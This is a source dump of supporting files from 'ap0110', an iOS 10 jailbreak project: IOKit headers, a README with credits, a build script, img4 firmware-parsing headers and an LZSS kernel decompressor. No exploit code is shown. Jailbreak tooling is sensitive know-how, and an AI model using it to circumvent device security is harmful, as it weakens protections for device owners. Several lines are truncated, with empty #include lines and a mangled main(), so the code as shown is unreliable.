102 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout
103 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline
104 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready
105 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached
106 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left
107 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data
108 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ???
109 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists
110 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down
111 | // physical memory
112 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached
113 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued
114 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received
115 | // on interrupt port
116 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted
117 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device
118 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present
119 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted
120 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode
121 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun
122 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun
123 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly!
124 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required
125 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted
126 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded
127 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding
128 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past!
129 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future
130 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found
131 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen
132 |
133 | #ifdef __cplusplus
134 | }
135 | #endif
136 |
137 | #endif /* ! __IOKIT_IORETURN_H */
138 |
--------------------------------------------------------------------------------
/IOKit.framework/Headers/IOTypes.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | #ifndef __IOKIT_IOTYPES_H
29 | #define __IOKIT_IOTYPES_H
30 |
31 | #ifndef IOKIT
32 | #define IOKIT 1
33 | #endif /* !IOKIT */
34 |
35 | #if KERNEL
36 | #include
37 | #else
38 | #include
39 | #include
40 | #endif
41 |
42 | #include "IOReturn.h"
43 |
44 | #ifdef __cplusplus
45 | extern "C" {
46 | #endif
47 |
48 | #ifndef NULL
49 | #if defined (__cplusplus)
50 | #define NULL 0
51 | #else
52 | #define NULL ((void *)0)
53 | #endif
54 | #endif
55 |
56 | /*
57 | * Simple data types.
58 | */
59 | #ifndef __MACTYPES__ /* CF MacTypes.h */
60 | #ifndef __TYPES__ /* guess... Mac Types.h */
61 |
62 | #include
63 | #include
64 |
65 | #endif /* __TYPES__ */
66 | #endif /* __MACTYPES__ */
67 |
68 | #if KERNEL
69 | #include
70 | #endif
71 |
72 | typedef UInt32 IOOptionBits;
73 | typedef SInt32 IOFixed;
74 | typedef UInt32 IOVersion;
75 | typedef UInt32 IOItemCount;
76 | typedef UInt32 IOCacheMode;
77 |
78 | typedef UInt32 IOByteCount32;
79 | typedef UInt64 IOByteCount64;
80 |
81 | typedef UInt32 IOPhysicalAddress32;
82 | typedef UInt64 IOPhysicalAddress64;
83 | typedef UInt32 IOPhysicalLength32;
84 | typedef UInt64 IOPhysicalLength64;
85 |
86 | #ifdef __LP64__
87 | typedef mach_vm_address_t IOVirtualAddress;
88 | #else
89 | typedef vm_address_t IOVirtualAddress;
90 | #endif
91 |
92 | #if defined(__LP64__) && defined(KERNEL)
93 | typedef IOByteCount64 IOByteCount;
94 | #else
95 | typedef IOByteCount32 IOByteCount;
96 | #endif
97 |
98 | typedef IOVirtualAddress IOLogicalAddress;
99 |
100 | #if defined(__LP64__) && defined(KERNEL)
101 |
102 | typedef IOPhysicalAddress64 IOPhysicalAddress;
103 | typedef IOPhysicalLength64 IOPhysicalLength;
104 | #define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))
105 | #define IOPhysSize 64
106 |
107 | #else
108 |
109 | typedef IOPhysicalAddress32 IOPhysicalAddress;
110 | typedef IOPhysicalLength32 IOPhysicalLength;
111 | #define IOPhysical32( hi, lo ) (lo)
112 | #define IOPhysSize 32
113 |
114 | #endif
115 |
116 |
117 | typedef struct
118 | {
119 | IOPhysicalAddress address;
120 | IOByteCount length;
121 | } IOPhysicalRange;
122 |
123 | typedef struct
124 | {
125 | IOVirtualAddress address;
126 | IOByteCount length;
127 | } IOVirtualRange;
128 |
129 | #ifdef __LP64__
130 | typedef IOVirtualRange IOAddressRange;
131 | #else /* !__LP64__ */
132 | typedef struct
133 | {
134 | mach_vm_address_t address;
135 | mach_vm_size_t length;
136 | } IOAddressRange;
137 | #endif /* !__LP64__ */
138 |
139 | /*
140 | * Map between #defined or enum'd constants and text description.
141 | */
142 | typedef struct {
143 | int value;
144 | const char *name;
145 | } IONamedValue;
146 |
147 |
148 | /*
149 | * Memory alignment -- specified as a power of two.
150 | */
151 | typedef unsigned int IOAlignment;
152 |
153 | #define IO_NULL_VM_TASK ((vm_task_t)0)
154 |
155 |
156 | /*
157 | * Pull in machine specific stuff.
158 | */
159 |
160 | //#include
161 |
162 | #ifndef MACH_KERNEL
163 |
164 | #ifndef __IOKIT_PORTS_DEFINED__
165 | #define __IOKIT_PORTS_DEFINED__
166 | #ifdef KERNEL
167 | typedef struct OSObject * io_object_t;
168 | #else /* KERNEL */
169 | typedef mach_port_t io_object_t;
170 | #endif /* KERNEL */
171 | #endif /* __IOKIT_PORTS_DEFINED__ */
172 |
173 | #include
174 |
175 | typedef io_object_t io_connect_t;
176 | typedef io_object_t io_enumerator_t;
177 | typedef io_object_t io_iterator_t;
178 | typedef io_object_t io_registry_entry_t;
179 | typedef io_object_t io_service_t;
180 |
181 | #define IO_OBJECT_NULL ((io_object_t) 0)
182 |
183 | #endif /* MACH_KERNEL */
184 |
185 | // IOConnectMapMemory memoryTypes
186 | enum {
187 | kIODefaultMemoryType = 0
188 | };
189 |
190 | enum {
191 | kIODefaultCache = 0,
192 | kIOInhibitCache = 1,
193 | kIOWriteThruCache = 2,
194 | kIOCopybackCache = 3,
195 | kIOWriteCombineCache = 4
196 | };
197 |
198 | // IOMemory mapping options
199 | enum {
200 | kIOMapAnywhere = 0x00000001,
201 |
202 | kIOMapCacheMask = 0x00000700,
203 | kIOMapCacheShift = 8,
204 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,
205 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,
206 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift,
207 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift,
208 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift,
209 |
210 | kIOMapUserOptionsMask = 0x00000fff,
211 |
212 | kIOMapReadOnly = 0x00001000,
213 |
214 | kIOMapStatic = 0x01000000,
215 | kIOMapReference = 0x02000000,
216 | kIOMapUnique = 0x04000000
217 | #ifdef XNU_KERNEL_PRIVATE
218 | , kIOMap64Bit = 0x08000000
219 | #endif
220 | };
221 |
222 | /*! @enum Scale Factors
223 | @discussion Used when a scale_factor parameter is required to define a unit of time.
224 | @constant kNanosecondScale Scale factor for nanosecond based times.
225 | @constant kMicrosecondScale Scale factor for microsecond based times.
226 | @constant kMillisecondScale Scale factor for millisecond based times.
227 | @constant kTickScale Scale factor for the standard (100Hz) tick.
228 | @constant kSecondScale Scale factor for second based times. */
229 |
230 | enum {
231 | kNanosecondScale = 1,
232 | kMicrosecondScale = 1000,
233 | kMillisecondScale = 1000 * 1000,
234 | kSecondScale = 1000 * 1000 * 1000,
235 | kTickScale = (kSecondScale / 100)
236 | };
237 |
238 | /* compatibility types */
239 |
240 | #ifndef KERNEL
241 |
242 | typedef unsigned int IODeviceNumber;
243 |
244 | #endif
245 |
246 | #ifdef __cplusplus
247 | }
248 | #endif
249 |
250 | #endif /* ! __IOKIT_IOTYPES_H */
251 |
--------------------------------------------------------------------------------
/IOKit.framework/Headers/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | /*
24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
25 | *
26 | * HISTORY
27 | *
28 | */
29 |
30 | #ifndef __OS_OSMESSAGENOTIFICATION_H
31 | #define __OS_OSMESSAGENOTIFICATION_H
32 |
33 | #ifdef __cplusplus
34 | extern "C" {
35 | #endif
36 |
37 | #include
38 | #include "IOReturn.h"
39 |
40 | enum {
41 | kFirstIOKitNotificationType = 100,
42 | kIOServicePublishNotificationType = 100,
43 | kIOServiceMatchedNotificationType = 101,
44 | kIOServiceTerminatedNotificationType = 102,
45 | kIOAsyncCompletionNotificationType = 150,
46 | kIOServiceMessageNotificationType = 160,
47 | kLastIOKitNotificationType = 199
48 | };
49 |
50 | enum {
51 | kOSNotificationMessageID = 53,
52 | kOSAsyncCompleteMessageID = 57,
53 | kMaxAsyncArgs = 16
54 | };
55 |
56 | enum {
57 | kIOAsyncReservedIndex = 0,
58 | kIOAsyncReservedCount,
59 |
60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
61 | kIOAsyncCalloutRefconIndex,
62 | kIOAsyncCalloutCount,
63 |
64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
65 | kIOMatchingCalloutRefconIndex,
66 | kIOMatchingCalloutCount,
67 |
68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
69 | kIOInterestCalloutRefconIndex,
70 | kIOInterestCalloutServiceIndex,
71 | kIOInterestCalloutCount
72 | };
73 |
74 | enum {
75 | kOSAsyncRefCount = 8,
76 | kOSAsyncRefSize = 32
77 | };
78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
79 |
80 | struct OSNotificationHeader {
81 | vm_size_t size; /* content size */
82 | natural_t type;
83 | OSAsyncReference reference;
84 |
85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
86 | unsigned char content[];
87 | #else
88 | unsigned char content[0];
89 | #endif
90 | };
91 |
92 | struct IOServiceInterestContent {
93 | natural_t messageType;
94 | void * messageArgument[1];
95 | };
96 |
97 | struct IOAsyncCompletionContent {
98 | IOReturn result;
99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 | void * args[];
101 | #else
102 | void * args[0];
103 | #endif
104 | };
105 |
106 | #ifndef __cplusplus
107 | typedef struct OSNotificationHeader OSNotificationHeader;
108 | typedef struct IOServiceInterestContent IOServiceInterestContent;
109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
110 | #endif
111 |
112 | #ifdef __cplusplus
113 | }
114 | #endif
115 |
116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
117 |
118 |
--------------------------------------------------------------------------------
/IOKit.framework/IOKit.tbd:
--------------------------------------------------------------------------------
1 | Versions/A/IOKit.tbd
--------------------------------------------------------------------------------
/IOKit.framework/Versions/Current:
--------------------------------------------------------------------------------
1 | A
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ap0110
2 | ap0110 is an autoexecuting jailbreak for iOS 10.x, on 32 and 64-bit.
3 |
4 | Developed by the Athenus Dev Team and w212. <3
5 |
6 | ## Credits
7 | ```
8 | tihmstar - h3lix, liboffsetfinder32, liboffsetfinder64
9 | SongXiaoXi - sockH3lix, 32-bit version of sock_port
10 | spacepilotAV - voip_load/Athenus autoexecution, most of the porting of sockH3lix to function with Athenus & testing
11 | mario_bros_tech - not any testing because he's a fuckhead ;)
12 | ```
13 |
14 | ## Confirmed Supported Devices
15 | |Device|Version|
16 | |-|-|
17 | |iPhone 5|iOS 10.3.3|
18 | |iPhone 5|iOS 10.3.4|
19 | |iPhone 5S|iOS 10.3.3|
20 |
--------------------------------------------------------------------------------
/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | rm Payload.ipa
4 | xcodebuild build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO -sdk iphoneos
5 | mkdir Payload
6 | mv build/Release-iphoneos/ap0110.app Payload/
7 | cp Athenus/Ap0110-1024.png Payload/ap0110.app/
8 | zip -r ap0110.ipa Payload
9 | rm -rf Payload
10 | rm -rf build
11 | xcodebuild clean
12 |
--------------------------------------------------------------------------------
/img4tool/all_img4tool.h:
--------------------------------------------------------------------------------
1 | //
2 | // all.h
3 | // img4tool
4 | //
5 | // Created by tihmstar on 15.06.16.
6 | // Copyright © 2016 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef all_h
10 | #define all_h
11 |
12 | #define error(a ...) printf("[Error] %s: ",__func__),printf(a)
13 | #define warning(a ...) printf("[Warning] %s: ",__func__),printf(a)
14 |
15 | #ifdef DEBUG //this is for developing with Xcode
16 | #define IMG4TOOL_VERSION_COMMIT_COUNT "Debug"
17 | #define IMG4TOOL_VERSION_COMMIT_SHA "Build: " __DATE__ " " __TIME__
18 | #define HAVE_LIBCOMPRESSION
19 | #else
20 | #include
21 | #endif
22 |
23 | #endif /* all_h */
24 |
--------------------------------------------------------------------------------
/img4tool/img4.h:
--------------------------------------------------------------------------------
1 | //
2 | // img4.h
3 | // img4tool
4 | //
5 | // Created by tihmstar on 15.06.16.
6 | // Copyright © 2016 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef img4_h
10 | #define img4_h
11 |
12 | #ifdef __cplusplus
13 | extern "C" {
14 | #endif
15 |
16 | #include
17 | #include
18 | #define LEN_XTND 0x80 /* Indefinite or long form */
19 | typedef unsigned char byte;
20 |
21 | #define putStr(s,l) printf("%.*s",(int)l,s)
22 |
23 | //TagClass
24 | #define kASN1TagClassUniversal 0
25 | #define kASN1TagClassApplication 1
26 | #define kASN1TagClassContextSpecific 2
27 | #define kASN1TagClassPrivate 3
28 |
29 | //primitive
30 | #define kASN1Primitive 0
31 | #define kASN1Contructed 1
32 |
33 | //tagNumber
34 | #define kASN1TagEnd_of_Content 0
35 | #define kASN1TagBOOLEAN 1
36 | #define kASN1TagINTEGER 2
37 | #define kASN1TagBIT 3
38 | #define kASN1TagOCTET 4
39 | #define kASN1TagNULL 5
40 | #define kASN1TagOBJECT 6
41 | #define kASN1TagObject 7
42 | #define kASN1TagEXTERNAL 8
43 | #define kASN1TagREAL 9
44 | #define kASN1TagENUMERATED 10 //0x0A
45 | #define kASN1TagEMBEDDED 11 //0x0B
46 | #define kASN1TagUTF8String 12 //0x0C
47 | #define kASN1TagRELATIVE_OID 13 //0x0D
48 | #define kASN1TagReserved (14 | 15) //(0x0E | 0x0F)
49 | #define kASN1TagSEQUENCE 16 //0x10
50 | #define kASN1TagSET 17 //0x11
51 | #define kASN1TagNumericString 18 //0x12
52 | #define kASN1TagPrintableString 19 //0x13
53 | #define kASN1TagT61String 20 //0x14
54 | #define kASN1TagVideotexString 21 //0x15
55 | #define kASN1TagIA5String 22 //0x16
56 | #define kASN1TagUTCTime 23 //0x17
57 | #define kASN1TagGeneralizedTime 24 //0x18
58 | #define kASN1TagGraphicString 25 //0x19
59 | #define kASN1TagVisibleString 26 //0x1A
60 | #define kASN1TagGeneralString 27 //0x1B
61 | #define kASN1TagUniversalString 28 //0x1C
62 | #define kASN1TagCHARACTER 29 //0x1D
63 | #define kASN1TagBMPString 30 //0x1E
64 | #define kASN1TagPrivate (char)0xff
65 |
66 | typedef struct{
67 | byte tagNumber : 5;
68 | byte isConstructed : 1;
69 | byte tagClass : 2;
70 | }t_asn1Tag;
71 |
72 | typedef struct{
73 | byte len : 7;
74 | byte isLong : 1;
75 | }t_asn1Length;
76 |
77 | typedef struct{
78 | size_t dataLen;
79 | size_t sizeBytes;
80 | } t_asn1ElemLen;
81 |
82 | typedef struct{
83 | byte num : 7;
84 | byte more : 1;
85 | }t_asn1PrivateTag;
86 |
87 |
88 | #ifndef __cplusplus
89 | typedef enum{
90 | false,
91 | true
92 | }bool;
93 | #endif
94 |
95 | //asn1
96 | t_asn1ElemLen asn1Len(const char buf[4]);
97 | char *ans1GetString(char *buf, char **outString, size_t *strlen);
98 | int asn1ElementsInObject(const char *buf);
99 | char *asn1ElementAtIndex(const char *buf, int index);
100 |
101 |
102 | char *getValueForTagInSet(char *set, uint32_t tag);
103 |
104 |
105 | //img4
106 | void printIM4P(char *buf);
107 | void printIM4R(char *buf);
108 | void printIM4M(char *buf, bool printAll);
109 | void printMANB(char *buf, bool printAll);
110 |
111 | int sequenceHasName(const char *buf, char *name);
112 | int getSequenceName(const char *buf,char**name, size_t *nameLen);
113 | size_t asn1GetPrivateTagnum(t_asn1Tag *tag, size_t *sizebytes);
114 | int extractFileFromIM4P(char *buf, const char *dstFilename);
115 | void printElemsInIMG4(char *buf, bool printAll, bool im4pOnly);
116 |
117 | char *getElementFromIMG4(char *buf, char* element);
118 | int extractElementFromIMG4(char *buf, char* element, const char *dstFilename);
119 | char *makeIMG4(char *im4p, char *im4m, char *im4r, size_t *size);
120 |
121 | char *getBNCHFromIM4M(const char* im4m, size_t *nonceSize);
122 | char *getIM4PFromIMG4(char *buf);
123 | char *getIM4MFromIMG4(char *buf);
124 |
125 | int replaceNameInIM4P(char *buf, const char *newName);
126 | int verifyIM4MSignature(const char *buf);
127 | int verifyIMG4(char *buf, plist_t buildmanifest);
128 |
129 | plist_t getBuildIdentityForIM4M(const char *buf, const plist_t buildmanifest);
130 | void printGeneralBuildIdentityInformation(plist_t buildidentity);
131 |
132 | char* extractPayloadFromIM4P(const char* buf, const char** compname, size_t *len);
133 |
134 | #ifdef __cplusplus
135 | }
136 | #endif
137 |
138 | #endif /* img4_h */
139 |
--------------------------------------------------------------------------------
/img4tool/img4tool.h:
--------------------------------------------------------------------------------
1 | //
2 | // img4tool.h
3 | // futurerestore
4 | //
5 | // Created by tihmstar on 03.09.16.
6 | // Copyright © 2016 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef img4tool_h
10 | #define img4tool_h
11 |
12 | #ifdef __cplusplus
13 | extern "C" {
14 | #endif
15 |
16 | #include
17 |
18 | char *im4mFormShshFile(const char *shshfile, char **generator);
19 | char *readFromFile(const char *filePath);
20 | char *parseNonce(const char *nonce,size_t noncelen);
21 |
22 |
23 | #ifdef __cplusplus
24 | }
25 | #endif
26 |
27 | #endif /* img4tool_h */
28 |
--------------------------------------------------------------------------------
/img4tool/lzssdec.h:
--------------------------------------------------------------------------------
1 | //
2 | // lzssdec.h
3 | // img4tool
4 | //
5 | // Code borrowed from: http://newosxbook.com/src.jl?tree=listings&file=joker.c
6 | // Coded by Jonathan Levin (a.k.a @Morpheus______), http://newosxbook.com
7 |
8 | #ifndef lzssdec_h
9 | #define lzssdec_h
10 |
11 | #include
12 | #include
13 |
14 | char *tryLZSS(char *compressed, size_t *filesize);
15 |
16 | #endif /* lzssdec_h */
17 |
--------------------------------------------------------------------------------
/liboffsetfinder32/img3dec.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // img3dec.hpp
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/12/19.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef img3dec_hpp
10 | #define img3dec_hpp
11 |
12 | #include
13 |
14 | typedef struct img3 img3;
15 | typedef struct tag tag;
16 |
17 | class img3decompress {
18 | FILE *file;
19 | off_t filesize;
20 | const char *key;
21 | const char *iv;
22 | uint8_t *mmapped;
23 | img3 *img3Header;
24 | int fd;
25 | char ident[5];
26 | char type[5];
27 | tag *tag;
28 | size_t lzss_size;
29 | size_t lzss_src_size;
30 | bool has_kbag;
31 | uint32_t ibuf_off = 0;
32 | lzssdecompress lzss;
33 | uint8_t *data;
34 | public:
35 | img3decompress(FILE *inputfh, const char *key = nullptr, const char *iv = nullptr);
36 | ~img3decompress();
37 | inline size_t out_size() const noexcept {
38 | return lzss_size;
39 | }
40 |
41 | // Return false to indicate that the decompression encountered EoF
42 | bool decompress(uint8_t *out_buf, size_t &out_size);
43 | };
44 |
45 | int decompress_kernel_32(FILE *inputfh, void *&memory, size_t &size);
46 |
47 | #endif /* img3dec_hpp */
48 |
--------------------------------------------------------------------------------
/liboffsetfinder32/lzssdec.cpp:
--------------------------------------------------------------------------------
1 | //
2 | // lzssdec.cpp
3 | // sockH3lix
4 | //
5 | // Created by SXX on 2020/12/19.
6 | // Copyright © 2020 tihmstar. All rights reserved.
7 |
8 | #if !__arm64__
9 | // (C)2009 Willem Hengeveld itsme@xs4all.nl
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include "lzssdec.hpp"
18 |
19 | // streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c
20 | // you can use lzssdec in a filter, like:
21 | //
22 | // cat file.lzss | lzssdec > file.decompressed
23 | //
24 | extern "C" int g_debug= 0;
25 |
26 | lzssdecompress::lzssdecompress() {
27 | _maxmatch= 18; // 4 bit size + threshold
28 | _dictsize= 4096; // 12 bit size
29 | _copythreshold= 3; // 0 == copy 3 bytes
30 | _dict= new uint8_t[_dictsize+_maxmatch-1];
31 |
32 | reset();
33 | }
34 | lzssdecompress::~lzssdecompress() {
35 | delete[] _dict;
36 | _dict= 0; _dictsize= 0;
37 | }
38 | void lzssdecompress::reset() {
39 | _state=EXPECTINGFLAG;
40 | _flags= 0; _bitnr= 0;
41 | _src=_srcend=_dst=_dstend=0;
42 | memset(_dict, ' ', _dictsize+_maxmatch-1);
43 | _dictptr= _dictsize-_maxmatch;
44 | _inputoffset= 0;
45 | _outputoffset= 0;
46 | _firstbyte= 0;
47 | _copyptr= 0;
48 | _copycount= 0;
49 | }
50 | void lzssdecompress::decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused) {
51 | _src= src; _srcend= src+srclen;
52 | _dst= dst; _dstend= dst+dstlen;
53 |
54 | while (_src<_srcend && _dst<_dstend) {
55 | switch(_state) {
56 | case EXPECTINGFLAG:
57 | if (g_debug) fprintf(stderr, "%08x,%08x: flag: %02x\n", _inputoffset, _outputoffset, *_src);
58 | _flags= *_src++;
59 | _inputoffset++;
60 | _bitnr= 0;
61 | _state= PROCESSFLAGBIT;
62 | break;
63 | case PROCESSFLAGBIT:
64 | if (_flags&1) {
65 | if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x copybyte %02x\n", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src);
66 | addtodict(*_dst++ = *_src++);
67 | _inputoffset++;
68 | _outputoffset++;
69 | nextflagbit();
70 | }
71 | else {
72 | _firstbyte= *_src++;
73 | _inputoffset++;
74 | _state= EXPECTING2NDBYTE;
75 | }
76 | break;
77 | case EXPECTING2NDBYTE:
78 | {
79 | uint8_t secondbyte= *_src++;
80 | _inputoffset++;
81 | setcounter(_firstbyte, secondbyte);
82 | if (g_debug) fprintf(stderr, "%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr);
83 | if (g_debug) dumpcopydata();
84 | _state= COPYFROMDICT;
85 | }
86 | break;
87 | case COPYFROMDICT:
88 | copyfromdict();
89 | break;
90 | }
91 | }
92 | if (g_debug) fprintf(stderr, "decompress state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
93 | if (pdstused) *pdstused= (uint32_t)(_dst-dst);
94 | if (psrcused) *psrcused= (uint32_t)(_src-src);
95 | }
96 | void lzssdecompress::flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused) {
97 | if (g_debug) fprintf(stderr, "flash before state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
98 | _src= _srcend= NULL;
99 | _dst= dst; _dstend= dst+dstlen;
100 |
101 | if (_state==COPYFROMDICT)
102 | copyfromdict();
103 |
104 | if (pdstused) *pdstused= (uint32_t)(_dst-dst);
105 | if (g_debug) fprintf(stderr, "flash after state= %d, copy: 0x%x, 0x%x\n", _state, _copyptr, _copycount);
106 | }
107 | void lzssdecompress::copyfromdict() {
108 | while (_dst<_dstend && _copycount) {
109 | addtodict(*_dst++ = _dict[_copyptr++]);
110 | _outputoffset++;
111 | _copycount--;
112 | _copyptr= _copyptr&(_dictsize-1);
113 | }
114 | if (_copycount==0)
115 | nextflagbit();
116 | }
117 | void lzssdecompress::dumpcopydata() {
118 | // note: we are printing incorrect data, if _copyptr == _dictptr-1
119 | for (int i=0 ; i<_copycount ; i++)
120 | fprintf(stderr, " %02x", _dict[(_copyptr+i)&(_dictsize-1)]);
121 | fprintf(stderr, "\n");
122 | }
123 | void lzssdecompress::addtodict(uint8_t c) {
124 | _dict[_dictptr++]= c;
125 | _dictptr = _dictptr&(_dictsize-1);
126 | }
127 | void lzssdecompress::nextflagbit() {
128 | _bitnr++;
129 | _flags>>=1;
130 | _state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT;
131 | }
132 | void lzssdecompress::setcounter(uint8_t first, uint8_t second) {
133 | _copyptr= first | ((second&0xf0)<<4);
134 | _copycount= _copythreshold + (second&0xf);
135 | }
136 |
137 | #ifdef HAVE_MAIN
138 | void usage() {
139 | fprintf(stderr, "Usage: lzssdec [-d] [-o OFFSET]\n");
140 | }
141 | int main(int argc,char**argv) {
142 | #define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1 bytes
167 | while (skipbytes && !feof(stdin)) {
168 | int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), stdin);
169 | skipbytes -= nr;
170 | }
171 |
172 | while (!feof(stdin)) {
173 | size_t nr= fread(ibuf, 1, CHUNK, stdin);
174 | if (nr==0) {
175 | perror("read");
176 | return 1;
177 | }
178 | if (nr==0)
179 | break;
180 |
181 | size_t srcp= 0;
182 | while (srcp 0x%x\n", srcused, dstused);
193 | }
194 | }
195 | if (g_debug) fprintf(stderr, "done reading\n");
196 | uint32_t dstused;
197 | lzss.flush(obuf, CHUNK, &dstused);
198 | size_t nw= fwrite(obuf, 1, dstused, stdout);
199 | if (nw
13 |
14 | #ifdef __cplusplus
15 |
16 | extern "C" int g_debug;
17 | class __attribute__((visibility("hidden"))) lzssdecompress {
18 | enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE };
19 | int _state;
20 | uint8_t _flags;
21 | int _bitnr;
22 | uint8_t *_src, *_srcend;
23 | uint8_t *_dst, *_dstend;
24 | uint8_t _firstbyte;
25 |
26 | uint8_t *_dict;
27 |
28 | int _dictsize;
29 | int _maxmatch;
30 | int _copythreshold;
31 |
32 | int _dictptr;
33 |
34 | int _copyptr;
35 | int _copycount;
36 |
37 | int _inputoffset;
38 | int _outputoffset;
39 | public:
40 | lzssdecompress();
41 | ~lzssdecompress();
42 | void reset();
43 | void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused);
44 | void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused);
45 | void copyfromdict();
46 | void dumpcopydata();
